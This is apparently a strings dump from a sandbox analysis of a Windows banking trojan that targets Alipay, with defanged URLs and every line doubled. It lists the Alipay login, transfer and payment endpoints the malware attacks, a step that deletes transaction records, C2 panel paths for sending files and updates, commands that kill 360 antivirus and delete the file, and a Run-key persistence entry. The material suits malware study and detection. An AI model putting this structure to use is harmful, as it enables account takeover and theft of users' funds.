9 9
:-1014,URL
:-1014,URL
:-19011,
:-19011,
TEAKEY
TEAKEY
my.alipay.com
my.alipay.com
consumeprod.alipay.com
consumeprod.alipay.com
fastpaycashier.htm
fastpaycashier.htm
ebankpay.htm
ebankpay.htm
WinHttp.WinHttpRequest.5.1
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
hXXp://cashier.alipay.com/standard/payment/cashier.htm?orderId=
hXXp://cashier.alipay.com/standard/payment/cashier.htm?orderId=
hXXp://VVV.api666.com/
hXXp://VVV.api666.com/
hXXp://VVV.ip.cn/
hXXp://VVV.ip.cn/
SQLite format 3
SQLite format 3
CREATE TABLE tblSwitcher(key LONGVARCHAR,pattern LONGVARCHAR NOT NULL,type INTEGER NOT NULL,flag INTEGER DEFAULT 0 NOT NULL,set_time INTEGER NOT NULL,action INTEGER NOT NULL DEFAULT 1,primary key(key, pattern))5
CREATE TABLE tblSwitcher(key LONGVARCHAR,pattern LONGVARCHAR NOT NULL,type INTEGER NOT NULL,flag INTEGER DEFAULT 0 NOT NULL,set_time INTEGER NOT NULL,action INTEGER NOT NULL DEFAULT 1,primary key(key, pattern))5
indexsqlite_autoindex_tblSwitcher_1tblSwitcher
indexsqlite_autoindex_tblSwitcher_1tblSwitcher
CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)'
CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)'
indexsqlite_autoindex_meta_1meta
indexsqlite_autoindex_meta_1meta
alipay.comconsumeprod.alipay.com
alipay.comconsumeprod.alipay.com
alipay.commy.alipay.com
alipay.commy.alipay.com
alipay.comcashierztg.alipay.com
alipay.comcashierztg.alipay.com
alipay.comcashierzue.alipay.com
alipay.comcashierzue.alipay.com
alipay.comcashierzth.alipay.com
alipay.comcashierzth.alipay.com
alipay.comfinanceprod.alipay.com
alipay.comfinanceprod.alipay.com
alipay.comshenghuo.alipay.com
alipay.comshenghuo.alipay.com
alipay.comVVV.alipay.com
alipay.comVVV.alipay.com
MCPattern3.db
MCPattern3.db
CtableMultiCorePatternUrlMultiCorePatternUrl
CtableMultiCorePatternUrlMultiCorePatternUrl
CREATE TABLE MultiCorePatternUrl (url VARCHAR(1024) default 0,client_id INTEGER default -1)
CREATE TABLE MultiCorePatternUrl (url VARCHAR(1024) default 0,client_id INTEGER default -1)
CREATE TABLE MultiCorePattern (dirty INTEGER default 1,server_id VARCHAR(1024),client_id INTEGER PRIMARY KEY,coretype INTEGER default 0)-
CREATE TABLE MultiCorePattern (dirty INTEGER default 1,server_id VARCHAR(1024),client_id INTEGER PRIMARY KEY,coretype INTEGER default 0)-
indexsqlite_autoindex_db_info_1db_info
indexsqlite_autoindex_db_info_1db_info
CREATE TABLE db_info (id VARCHAR(1024) PRIMARY KEY,value VARCHAR(1024),reserved INT
CREATE TABLE db_info (id VARCHAR(1024) PRIMARY KEY,value VARCHAR(1024),reserved INT
hXXps://my.alipay.com/portal/i.htm/
hXXps://my.alipay.com/portal/i.htm/
hXXps://lab.alipay.com/user/navigate.htm/
hXXps://lab.alipay.com/user/navigate.htm/
hXXps://authzth.alipay.com/login/certcheck.htm/
hXXps://authzth.alipay.com/login/certcheck.htm/
hXXps://auth.alipay.com/login/index.htm/
hXXps://auth.alipay.com/login/index.htm/
hXXps://auth.alipay.com/
hXXps://auth.alipay.com/
hXXp://VVV.baidu.com/link/
hXXp://VVV.baidu.com/link/
hXXp://auth.alipay.com/login/index.htm/
hXXp://auth.alipay.com/login/index.htm/
hXXp://auth.alipay.com/
hXXp://auth.alipay.com/
hXXps://tbapi.alipay.com/trade/trade_payment.htm/
hXXps://tbapi.alipay.com/trade/trade_payment.htm/
hXXps://cashierzue.alipay.com/standard/fastpay/fastpaycashier.htm/
hXXps://cashierzue.alipay.com/standard/fastpay/fastpaycashier.htm/
hXXps://cashierzue.alipay.com/preprocess/trade/tradepreprocessgw.htm/
hXXps://cashierzue.alipay.com/preprocess/trade/tradepreprocessgw.htm/
hXXp://buyer.trade.taobao.com/trade/pay.htm/
hXXp://buyer.trade.taobao.com/trade/pay.htm/
hXXps://cashierzue.alipay.com/standard/gateway/ebankpay.htm/
hXXps://cashierzue.alipay.com/standard/gateway/ebankpay.htm/
hXXps://cashierztg.alipay.com/standard/fastpay/fastpaycashier.htm/
hXXps://cashierztg.alipay.com/standard/fastpay/fastpaycashier.htm/
hXXps://cashierzui.alipay.com/standard/payment/bankcardform.htm/
hXXps://cashierzui.alipay.com/standard/payment/bankcardform.htm/
hXXps://cashierzui.alipay.com/standard/gateway/ebankpay.htm/
hXXps://cashierzui.alipay.com/standard/gateway/ebankpay.htm/
hXXps://VVV.alipay.com/
hXXps://VVV.alipay.com/
hXXp://VVV.alipay.com/
hXXp://VVV.alipay.com/
hXXp://mse.sogou.com/app/features/feichuan.h
hXXp://mse.sogou.com/app/features/feichuan.h
CREATE TABLE MultiCorePatternUrl (url VARCHA
CREATE TABLE MultiCorePatternUrl (url VARCHA
CREATE TABLE db_info (id VARCHAR(1024) PRIMARY KEY,value VARCHAR(1024),reserved INTEGER)-
CREATE TABLE db_info (id VARCHAR(1024) PRIMARY KEY,value VARCHAR(1024),reserved INTEGER)-
CREATE TABLE MultiCorePattern (dirty INTEGER default 1,server_id VARCHAR(1024),client_id INTEGER PRIMARY KEY,coretype INTEGER default 0)}
CREATE TABLE MultiCorePattern (dirty INTEGER default 1,server_id VARCHAR(1024),client_id INTEGER PRIMARY KEY,coretype INTEGER default 0)}
1indexMultiCorePatternUrl_client_id_indexMultiCorePatternUrl
1indexMultiCorePatternUrl_client_id_indexMultiCorePatternUrl
CREATE INDEX MultiCorePatternUrl_client_id_index ON MultiCorePatternUrl(client_id)
CREATE INDEX MultiCorePatternUrl_client_id_index ON MultiCorePatternUrl(client_id)
hXXp://mse.sogou.com/app/features/feichuan.html/
hXXp://mse.sogou.com/app/features/feichuan.html/
hXXps://consumeprod.alipay.com/record/standard.htm/
hXXps://consumeprod.alipay.com/record/standard.htm/
hXXps://consumeprod.alipay.com/record/index.htm/
hXXps://consumeprod.alipay.com/record/index.htm/
Software\Tencent\QQBrowser\Advanced\EnableChromeTab
Software\Tencent\QQBrowser\Advanced\EnableChromeTab
alipay_jmp.txt
alipay_jmp.txt
Software\Classes\360seURL\Application\ApplicationIcon
Software\Classes\360seURL\Application\ApplicationIcon
Software\Microsoft\Windows\CurrentVersion\Uninstall\360Chrome\DisplayIcon
Software\Microsoft\Windows\CurrentVersion\Uninstall\360Chrome\DisplayIcon
hXXps://shenghuo.alipay.com/transfercore/validateTransferSuperBankFlow.json
hXXps://shenghuo.alipay.com/transfercore/validateTransferSuperBankFlow.json
hXXps://shenghuo.alipay.com/transfercore/fill.htm
hXXps://shenghuo.alipay.com/transfercore/fill.htm
hXXps://omeo.alipay.com/service/checkcode?sessionID=
hXXps://omeo.alipay.com/service/checkcode?sessionID=
SESSIONkEY
SESSIONkEY
-12027,TEAKEY
-12027,TEAKEY
&payChannel=0100&supportTime=
&payChannel=0100&supportTime=
hXXps://shenghuo.alipay.com/transfercore/confirmSuperNet.htm
hXXps://shenghuo.alipay.com/transfercore/confirmSuperNet.htm
supportTime
supportTime
passConfirmCheck
passConfirmCheck
:yhk_error03.html-----------------------------
:yhk_error03.html-----------------------------
c:\yhkerror03.html
c:\yhkerror03.html
&passConfirmCheck=
&passConfirmCheck=
&supportTime=
&supportTime=
hXXps://shenghuo.alipay.com/transfercore/fillAction.htm
hXXps://shenghuo.alipay.com/transfercore/fillAction.htm
payment/cashier.htm?orderId=
payment/cashier.htm?orderId=
yhk_error02.html
yhk_error02.html
:yhk_error02.html-----------------------------
:yhk_error02.html-----------------------------
hXXps://lab.alipay.com/consume/record/inpour.htm
hXXps://lab.alipay.com/consume/record/inpour.htm
hXXps://financeprod.alipay.com/fund/asset.htm
hXXps://financeprod.alipay.com/fund/asset.htm
suibianyige@qq.com
suibianyige@qq.com
yhk_error01.html
yhk_error01.html
:yhk_error01.html
:yhk_error01.html
yhkok.html
yhkok.html
[yhkok.html]
[yhkok.html]
yhk_error03.html
yhk_error03.html
hXXps://shenghuo.alipay.com/send/payment/fill.htm
hXXps://shenghuo.alipay.com/send/payment/fill.htm
&title=תÕË&memo=&smsNo=
&title=תÕË&memo=&smsNo=
hXXps://shenghuo.alipay.com/send/payment/submit.htm
hXXps://shenghuo.alipay.com/send/payment/submit.htm
pageAbsUrl:"hXXp://shenghuo.alipay.com/send/confirm.htm?orderId=
pageAbsUrl:"hXXp://shenghuo.alipay.com/send/confirm.htm?orderId=
hXXps://shenghuo.alipay.com/send/confirm.htm
hXXps://shenghuo.alipay.com/send/confirm.htm
dingdan.html
dingdan.html
:dingdan.html
:dingdan.html
zfb_ssid_error01.html
zfb_ssid_error01.html
zfb_ssid_error01.html
zfb_ssid_error01.html
yhdd.html
yhdd.html
hXXps://cashierzth.alipay.com/standard/payment/bankCardForm.htm
hXXps://cashierzth.alipay.com/standard/payment/bankCardForm.htm
.htm?outBizNo=
.htm?outBizNo=
hXXps://cashierzth.alipay.com/standard/gateway/ebankPay.htm?outBizNo=
hXXps://cashierzth.alipay.com/standard/gateway/ebankPay.htm?outBizNo=
alipay_yhzf_error01.txt
alipay_yhzf_error01.txt
:alipay_yhzf_error01.txt
:alipay_yhzf_error01.txt
function time(){return new Date().getTime()}
function time(){return new Date().getTime()}
hXXps://authztg.alipay.com/login/homeB.htm
hXXps://authztg.alipay.com/login/homeB.htm
password_input
password_input
password
password
J-login-btn
J-login-btn
personalweb.alipay.com
personalweb.alipay.com
:login_error01.txt
:login_error01.txt
login_error01.txt
login_error01.txt
Y@hXXps://consumeprod.alipay.com/record/standard.htm
Y@hXXps://consumeprod.alipay.com/record/standard.htm
hXXps://consumeprod.alipay.com/record/delete.json?record=
hXXps://consumeprod.alipay.com/record/delete.json?record=
alipay.com
alipay.com
cashier.htm
cashier.htm
zfb_error01.txt
zfb_error01.txt
:zfb_error01.txt
:zfb_error01.txt
payment/cashier.htm
payment/cashier.htm
error.htm
error.htm
:zfb_error02.txt
:zfb_error02.txt
zfb_error02.txt
zfb_error02.txt
tcresult.htm
tcresult.htm
ebitexpresspay.htm
ebitexpresspay.htm
waitresult.htm
waitresult.htm
payresult.htm
payresult.htm
:zf_error01.txt
:zf_error01.txt
zf_error01.txt
zf_error01.txt
:zf_error02.txt
:zf_error02.txt
zf_error02.txt
zf_error02.txt
c:\1242421.txt
c:\1242421.txt
hXXp://
hXXp://
hXXps://
hXXps://
hXXps://yebprod.alipay.com/yeb/quickRedeemApply.htm
hXXps://yebprod.alipay.com/yeb/quickRedeemApply.htm
:yeb_error01.txt
:yeb_error01.txt
yeb_error01.txt
yeb_error01.txt
quickRedeemResult.htm
quickRedeemResult.htm
url!!
url!!
quickRedeemApply.htm
quickRedeemApply.htm
:yeb_error02.txt
:yeb_error02.txt
yeb_error02.txt
yeb_error02.txt
hXXps://personalportal.alipay.com/portal/account/index.htm
hXXps://personalportal.alipay.com/portal/account/index.htm
hXXps://zht.alipay.com/asset/assetStatistics.json?_input_charset=utf-8&categoryType=FASTPAYSERVICE&t=
hXXps://zht.alipay.com/asset/assetStatistics.json?_input_charset=utf-8&categoryType=FASTPAYSERVICE&t=
hXXps://shenghuo.alipay.com/transfer/deposit/depositPreprocessGw.htm
hXXps://shenghuo.alipay.com/transfer/deposit/depositPreprocessGw.htm
hXXps://cashierzui.alipay.com/standard/deposit/depositCardForm.htm
hXXps://cashierzui.alipay.com/standard/deposit/depositCardForm.htm
hXXps://cashierzui.alipay.com/standard/deposit/depositAmountValidate.json
hXXps://cashierzui.alipay.com/standard/deposit/depositAmountValidate.json
hXXps://cashierzui.alipay.com/standard/gateway/ebankDeposit.json
hXXps://cashierzui.alipay.com/standard/gateway/ebankDeposit.json
url":"
url":"
,URL:
,URL:
hXXps://shenghuo.alipay.com/transfer/ac/acFill.htm
hXXps://shenghuo.alipay.com/transfer/ac/acFill.htm
function document.onkeydown()
function document.onkeydown()
if ( event.keyCode==9)
if ( event.keyCode==9)
event.keyCode = 0;
event.keyCode = 0;
event.cancelBubble = true;
event.cancelBubble = true;
s_sc.php?mac=
s_sc.php?mac=
test.txt
test.txt
s_start.php?mac=
s_start.php?mac=
&ping 127.0.0.1 -n 2&del /q "
&ping 127.0.0.1 -n 2&del /q "
cmd /c taskkill /F /IM
cmd /c taskkill /F /IM
s_submitqq.php?mac=
s_submitqq.php?mac=
360sd.exe
360sd.exe
360safe.exe
360safe.exe
s_sendsd.php?mac=
s_sendsd.php?mac=
\svchost.exe
\svchost.exe
@>c:\cmd.txt
@>c:\cmd.txt
cmd /c
cmd /c
c:\cmd.txt
c:\cmd.txt
shell/setshell.php
shell/setshell.php
s_subitqq.php?mac=
s_subitqq.php?mac=
@/desk/desk_get.php
@/desk/desk_get.php
s_getbox.php?mac=
s_getbox.php?mac=
/file/sendfile.php?mac=
/file/sendfile.php?mac=
update/check.php?check=1.3
update/check.php?check=1.3
\update.exe
\update.exe
anonymous@123.com
anonymous@123.com
.exe|.rar|.zip|.gif|.jpg|.mp3|.rm
.exe|.rar|.zip|.gif|.jpg|.mp3|.rm
%*.*f
%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
WinExec
WinExec
GetKeyState
GetKeyState
GetViewportOrgEx
GetViewportOrgEx
WINMM.dll
WINMM.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegOpenKeyExA
RegOpenKeyExA
ShellExecuteA
ShellExecuteA
COMCTL32.dll
COMCTL32.dll
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetViewportExtEx
comdlg32.dll
comdlg32.dll
RegCreateKeyExA
RegCreateKeyExA
.PAVCException@@
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.prn)|*.prn|
(*.*)|*.*||
(*.*)|*.*||
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
User32.dll
User32.dll
Gdi32.dll
Gdi32.dll
Kernel32.dll
Kernel32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
: %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
out.prn
out.prn
%d.%d
%d.%d
%d / %d
%d / %d
%d/%d
%d/%d
Bogus message code %d
Bogus message code %d
(%d-%d):
(%d-%d):
%ld%c
%ld%c
[%s:%d]
[%s:%d]
Range: bytes=%s-
Range: bytes=%s-
[%s:%d]
[%s:%d]
PASS %s
PASS %s
PASS ******
PASS ******
USER %s
USER %s
E:\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp
E:\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp
SIZE %s
SIZE %s
PORT
PORT
User-Agent: %s
User-Agent: %s
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Referer: %s
Referer: %s
Host: %s
Host: %s
GET %s HTTP/1.1
GET %s HTTP/1.1
HTTP/1.0
HTTP/1.0
HTTP/1.1
HTTP/1.1
Cookie: %s
Cookie: %s
%d, %s
%d, %s
\\192.168.0.129\TCP\1037
\\192.168.0.129\TCP\1037
NSPlayer/9.0.0.2980; {%s}; Host: %s
NSPlayer/9.0.0.2980; {%s}; Host: %s
rmff_fix_header: assuming data.size=%i
rmff_fix_header: assuming data.size=%i
rmff_fix_header: assuming data.num_packets=%i
rmff_fix_header: assuming data.num_packets=%i
rmff_fix_header: assuming prop.num_packets=%i
rmff_fix_header: assuming prop.num_packets=%i
rmff_fix_header: setting prop.data_offset from %i to %i
rmff_fix_header: setting prop.data_offset from %i to %i
rmff_fix_header: correcting prop.num_streams from %i to %i
rmff_fix_header: correcting prop.num_streams from %i to %i
rmff_fix_header: correcting prop.size from %i to %i
rmff_fix_header: correcting prop.size from %i to %i
%s %s %s
%s %s %s
Session: %s
Session: %s
Cseq: %u
Cseq: %u
%*s %s
%*s %s
%*s %u
%*s %u
CSeq: %u
CSeq: %u
rtsp://%s:%i
rtsp://%s:%i
rtsp://%s:%i/%s
rtsp://%s:%i/%s
ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586
ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586
GUID: 00000000-0000-0000-0000-000000000000
GUID: 00000000-0000-0000-0000-000000000000
[%s:%d]
[%s:%d]
User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)
User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)
Range: npt=%s-
Range: npt=%s-
%s/streamid=1
%s/streamid=1
%s/streamid=0
%s/streamid=0
Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play
Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play
If-Match: %s
If-Match: %s
RealChallenge2: %s, sd=%s
RealChallenge2: %s, sd=%s
Title: %s
Title: %s
Copyright: %s
Copyright: %s
Author: %s
Author: %s
real: Content-length for description too big (> %uMB)!
real: Content-length for description too big (> %uMB)!
Require: com.real.retain-entity-for-setup
Require: com.real.retain-entity-for-setup
SupportsMaximumASMBandwidth: 1
SupportsMaximumASMBandwidth: 1
Bandwidth: %u
Bandwidth: %u
Challenge1: %s
Challenge1: %s
hash output: %x %x %x %x
hash output: %x %x %x %x
hash input: %x %x %x %x
hash input: %x %x %x %x
stream=%u;rule=%u,
stream=%u;rule=%u,
Illegal character '%c' in input.
Illegal character '%c' in input.
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
#include "l.chs\afxres.rc" // Standard components
#include "l.chs\afxres.rc" // Standard components
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADUUWiseHelper.dll
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADUUWiseHelper.dll
>0123456789ABCDEF deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
>0123456789ABCDEF deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
F%*.*f
iphlpapi.dll
iphlpapi.dll
MPR.dll
MPR.dll
VERSION.dll
VERSION.dll
RASAPI32.dll
RASAPI32.dll
GetWindowsDirectoryA
GetWindowsDirectoryA
ExitWindowsEx
ExitWindowsEx
RegCreateKeyA
RegCreateKeyA
RegOpenKeyA
RegOpenKeyA
oledlg.dll
oledlg.dll
WSOCK32.dll
WSOCK32.dll
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
WININET.dll
WININET.dll
%x.tmp
%x.tmp
icmp.dll
icmp.dll
(*.htm;*.html)|*.htm;*.html
(*.htm;*.html)|*.htm;*.html
VVV.dywt.com.cn
VVV.dywt.com.cn
%s\%s.lnk
%s\%s.lnk
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
X-X-X-X-X-X
X-X-X-X-X-X
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
%s
%s
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
1.0.6
1.0.6
\shell32.dll
\shell32.dll
1.1.3
1.1.3
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
Corrupt JPEG data: found marker 0xx instead of RST%d
Corrupt JPEG data: found marker 0xx instead of RST%d
Warning: unknown JFIF revision number %d.d
Warning: unknown JFIF revision number %d.d
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Inconsistent progression sequence for component %d coefficient %d
Inconsistent progression sequence for component %d coefficient %d
Unknown Adobe color transform code %d
Unknown Adobe color transform code %d
Obtained XMS handle %u
Obtained XMS handle %u
Freed XMS handle %u
Freed XMS handle %u
Unrecognized component IDs %d %d %d, assuming YCbCr
Unrecognized component IDs %d %d %d, assuming YCbCr
JFIF extension marker: RGB thumbnail image, length %u
JFIF extension marker: RGB thumbnail image, length %u
JFIF extension marker: palette thumbnail image, length %u
JFIF extension marker: palette thumbnail image, length %u
JFIF extension marker: JPEG-compressed thumbnail image, length %u
JFIF extension marker: JPEG-compressed thumbnail image, length %u
Opened temporary file %s
Opened temporary file %s
Closed temporary file %s
Closed temporary file %s
Ss=%d, Se=%d, Ah=%d, Al=%d
Ss=%d, Se=%d, Ah=%d, Al=%d
Component %d: dc=%d ac=%d
Component %d: dc=%d ac=%d
Start Of Scan: %d components
Start Of Scan: %d components
Component %d: %dhx%dv q=%d
Component %d: %dhx%dv q=%d
Start Of Frame 0xx: width=%u, height=%u, components=%d
Start Of Frame 0xx: width=%u, height=%u, components=%d
Smoothing not supported with nonstandard sampling ratios
Smoothing not supported with nonstandard sampling ratios
RST%d
RST%d
At marker 0xx, recovery action %d
At marker 0xx, recovery action %d
Selected %d colors for quantization
Selected %d colors for quantization
Quantizing to %d colors
Quantizing to %d colors
Quantizing to %d = %d*%d*%d colors
Quantizing to %d = %d*%d*%d colors
%4u %4u %4u %4u %4u %4u %4u %4u
%4u %4u %4u %4u %4u %4u %4u %4u
Unexpected marker 0xx
Unexpected marker 0xx
Miscellaneous marker 0xx, length %u
Miscellaneous marker 0xx, length %u
with %d x %d thumbnail image
with %d x %d thumbnail image
JFIF extension marker: type 0xx, length %u
JFIF extension marker: type 0xx, length %u
Warning: thumbnail image size does not match data length %u
Warning: thumbnail image size does not match data length %u
JFIF APP0 marker: version %d.d, density %dx%d %d
JFIF APP0 marker: version %d.d, density %dx%d %d
= = = = = = = =
= = = = = = = =
Obtained EMS handle %u
Obtained EMS handle %u
Freed EMS handle %u
Freed EMS handle %u
